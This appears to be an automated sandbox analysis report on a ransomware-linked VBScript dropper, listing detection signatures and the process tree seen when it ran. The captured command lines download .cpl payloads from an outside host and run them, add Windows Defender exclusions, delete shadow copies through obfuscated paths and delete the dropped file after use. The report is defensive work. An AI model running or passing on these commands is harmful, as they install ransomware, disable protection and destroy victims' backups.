Edit tour
Windows
Analysis Report
NOTIFICATION_OF_DEPENDANTS.vbs
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Multi AV Scanner detection for dropped file
Sigma detected: Delete shadow copy via WMIC
VBScript performs obfuscated calls to suspicious functions
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Deletes shadow drive data (may be related to ransomware)
Loading BitLocker PowerShell Module
May encrypt documents and pictures (Ransomware)
Modifies existing user documents (likely ransomware behavior)
Overwrites Mozilla Firefox settings
Powershell drops PE file
Sigma detected: Control Panel Items
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation STDIN+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Shadow Copies Deletion Using Operating Systems Utilities
Sigma detected: Suspicious Ping/Del Command Combination
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes data at the end of the disk (often used by bootkits to hide malicious code)
Wscript starts Powershell (via cmd or directly)
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Command Line Path Traversal Evasion Attempt
Sigma detected: PowerShell Web Download
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Stores large binary data to the registry
Uses insecure TLS / SSL version for HTTPS connection
Classification
- System is w10x64
- wscript.exe (PID: 1224 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\NOTIF ICATION_OF _DEPENDANT S.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 4920 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -Command A dd-MpPrefe rence -Exc lusionPath 'C:\Users \user\AppD ata\Local\ Temp' MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 2888 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 7416 cmdline:
"C:\Window s\System32 \cmd.exe" /c powersh ell start- process ht tps://www. oldmutual. co.za/v3/a ssets/blt0 554f48052b b4620/blt8 b52803ba23 b252a/6674 2ed3b2cbc1 4f42b4434c /Superfund _Beneficia ry_Nominat ion_form.p df MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7424 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7468 cmdline:
powershell start-pro cess https ://www.old mutual.co. za/v3/asse ts/blt0554 f48052bb46 20/blt8b52 803ba23b25 2a/66742ed 3b2cbc14f4 2b4434c/Su perfund_Be neficiary_ Nomination _form.pdf MD5: 04029E121A0CFA5991749937DD22A1D9) - chrome.exe (PID: 7648 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --st art-maximi zed --sing le-argumen t https:// www.oldmut ual.co.za/ v3/assets/ blt0554f48 052bb4620/ blt8b52803 ba23b252a/ 66742ed3b2 cbc14f42b4 434c/Super fund_Benef iciary_Nom ination_fo rm.pdf MD5: 5BBFA6CBDF4C254EB368D534F9E23C92) - chrome.exe (PID: 7980 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --mojo-pla tform-chan nel-handle =2120 --fi eld-trial- handle=201 6,i,772707 1625406285 567,428303 8652588127 997,262144 --disable -features= Optimizati onGuideMod elDownload ing,Optimi zationHint s,Optimiza tionHintsF etching,Op timization TargetPred iction /pr efetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92) - cmd.exe (PID: 7708 cmdline:
"C:\Window s\System32 \cmd.exe" /c powersh ell Invoke -WebReques t -Uri htt ps://kilto ne.top/ste lin/rwcla. cpl -Outfi le $env:tm p\\fjeljie s.cpl MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7716 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7760 cmdline:
powershell Invoke-We bRequest - Uri https: //kiltone. top/stelin /rwcla.cpl -Outfile $env:tmp\\ fjeljies.c pl MD5: 04029E121A0CFA5991749937DD22A1D9) - cmd.exe (PID: 9020 cmdline:
"C:\Window s\System32 \cmd.exe" /c control C:\Users\ user\AppDa ta\Local\T emp/fjelji es.cpl MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 9040 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - control.exe (PID: 9084 cmdline:
control C: \Users\use r\AppData\ Local\Temp /fjeljies. cpl MD5: 11C18DBF352D81C9532A8EF442151CB1) - rundll32.exe (PID: 9116 cmdline:
"C:\Window s\system32 \rundll32. exe" Shell 32.dll,Con trol_RunDL L C:\Users \user\AppD ata\Local\ Temp/fjelj ies.cpl MD5: EF3179D498793BF4234F708D3BE28633) - rundll32.exe (PID: 9132 cmdline:
"C:\Window s\SysWOW64 \rundll32. exe" "C:\W indows\Sys WOW64\shel l32.dll",# 44 C:\User s\user\App Data\Local \Temp/fjel jies.cpl MD5: 889B99C52A60DD49227C5E485A016679) - cmd.exe (PID: 7412 cmdline:
cmd /c pow ershell -i nputformat none -out putformat none -NonI nteractive -Command Add-MpPref erence -Ex clusionPat h "$env:tm p" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 5928 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 3816 cmdline:
powershell -inputfor mat none - outputform at none -N onInteract ive -Comma nd Add-MpP reference -Exclusion Path "$env :tmp" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - cmd.exe (PID: 8700 cmdline:
cmd /c pow ershell In voke-WebRe quest -Uri https://k iltone.top /stelin/Go sjeufon.cp l -Outfile $env:tmp\ eryy65ty.e xe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 8708 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 8836 cmdline:
powershell Invoke-We bRequest - Uri https: //kiltone. top/stelin /Gosjeufon .cpl -Outf ile $env:t mp\eryy65t y.exe MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - cmd.exe (PID: 3404 cmdline:
cmd /c %te mp%/eryy65 ty.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 5828 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - eryy65ty.exe (PID: 8840 cmdline:
C:\Users\u ser\AppDat a\Local\Te mp/eryy65t y.exe MD5: 2B986178DA0C3D081F99AC8FB4A5952C) - WMIC.exe (PID: 5332 cmdline:
c:\shCUqe\ shCU\..\.. \Windows\s hCU\shCU\. .\..\syste m32\shCU\s hCU\..\..\ wbem\shCU\ shCUq\..\. .\wmic.exe shadowcop y delete MD5: C37F2F4F4B3CD128BDABCAEB2266A785) - conhost.exe (PID: 2544 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - WMIC.exe (PID: 4236 cmdline:
c:\SmbaZD\ Smba\..\.. \Windows\S mba\Smba\. .\..\syste m32\Smba\S mba\..\..\ wbem\Smba\ SmbaZ\..\. .\wmic.exe shadowcop y delete MD5: C37F2F4F4B3CD128BDABCAEB2266A785) - conhost.exe (PID: 2488 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 8664 cmdline:
cmd.exe /C ping 1.1. 1.1 -n 1 - w 3000 > N ul & Del / f /q "C:\U sers\user\ AppData\Lo cal\Temp\e ryy65ty.ex e" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 2948 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - PING.EXE (PID: 9024 cmdline:
ping 1.1.1 .1 -n 1 -w 3000 MD5: B3624DD758CCECF93A1226CEF252CA12)
- svchost.exe (PID: 8016 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- eryy65ty.exe (PID: 7624 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\eryy65 ty.exe" MD5: 2B986178DA0C3D081F99AC8FB4A5952C) - WMIC.exe (PID: 992 cmdline:
c:\fPLdrv\ fPLd\..\.. \Windows\f PLd\fPLd\. .\..\syste m32\fPLd\f PLd\..\..\ wbem\fPLd\ fPLdr\..\. .\wmic.exe shadowcop y delete MD5: C37F2F4F4B3CD128BDABCAEB2266A785) - conhost.exe (PID: 8700 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - WMIC.exe (PID: 4440 cmdline:
c:\VhJyqT\ VhJy\..\.. \Windows\V hJy\VhJy\. .\..\syste m32\VhJy\V hJy\..\..\ wbem\VhJy\ VhJyq\..\. .\wmic.exe shadowcop y delete MD5: C37F2F4F4B3CD128BDABCAEB2266A785) - conhost.exe (PID: 3776 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 3260 cmdline:
cmd.exe /C ping 1.1. 1.1 -n 1 - w 3000 > N ul & Del / f /q "C:\U sers\user\ AppData\Lo cal\Temp\e ryy65ty.ex e" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 3784 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - PING.EXE (PID: 3136 cmdline:
ping 1.1.1 .1 -n 1 -w 3000 MD5: B3624DD758CCECF93A1226CEF252CA12)
- eryy65ty.exe (PID: 2848 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\eryy65 ty.exe" MD5: 2B986178DA0C3D081F99AC8FB4A5952C) - WMIC.exe (PID: 2540 cmdline:
c:\gNJiqW\ gNJi\..\.. \Windows\g NJi\gNJi\. .\..\syste m32\gNJi\g NJi\..\..\ wbem\gNJi\ gNJiq\..\. .\wmic.exe shadowcop y delete MD5: C37F2F4F4B3CD128BDABCAEB2266A785) - conhost.exe (PID: 5820 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - WMIC.exe (PID: 6720 cmdline:
c:\EpadjY\ Epad\..\.. \Windows\E pad\Epad\. .\..\syste m32\Epad\E pad\..\..\ wbem\Epad\ Epadj\..\. .\wmic.exe shadowcop y delete MD5: C37F2F4F4B3CD128BDABCAEB2266A785) - conhost.exe (PID: 4184 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 6044 cmdline:
cmd.exe /C ping 1.1. 1.1 -n 1 - w 3000 > N ul & Del / f /q "C:\U sers\user\ AppData\Lo cal\Temp\e ryy65ty.ex e" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 5988 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - PING.EXE (PID: 3192 cmdline:
ping 1.1.1 .1 -n 1 -w 3000 MD5: B3624DD758CCECF93A1226CEF252CA12)
- notepad.exe (PID: 8528 cmdline:
"C:\Window s\system32 \NOTEPAD.E XE" C:\Use rs\user\Ap pData\Roam ing\Micros oft\Window s\Start Me nu\Program s\Startup\ Decryptfil es.txt MD5: 27F71B12CB585541885A31BE22F61C83)
- cleanup
⊘No configs have been found
⊘No yara matches
Operating System Destruction |
---|
Source: | Author: Joe Security: |
System Summary |
---|
Source: | Author: Kyaw Min Thein, Furkan Caliskan (@caliskanfurkan_): |
Source: | Author: Jonathan Cheong, oscd.community: |
Source: | Author: Jonathan Cheong, oscd.community: |
Source: | Author: Jonathan Cheong, oscd.community: |
Source: | Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades): |
Source: | Author: Ilya Krestinichev: |
Source: | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: |
Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: |
Source: | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): |
Source: | Author: Christian Burkard (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: Michael Haag: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: vburov: |
⊘No Suricata rule has matched
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | ReversingLabs: | ||
Source: | ReversingLabs: |
Source: | Integrated Neural Analysis Model: |
Source: | HTTP Parser: | ||
Source: | HTTP Parser: | ||
Source: | HTTP Parser: |
Source: | HTTPS traffic detected: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: |
Software Vulnerabilities |
---|
Source: | Child: |
Networking |
---|
Source: | Process created: |
Source: | IP Address: |
Source: | JA3 fingerprint: | ||
Source: | JA3 fingerprint: | ||
Source: | JA3 fingerprint: |
Source: | HTTPS traffic detected: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: |
Source: | HTTP traffic detected: |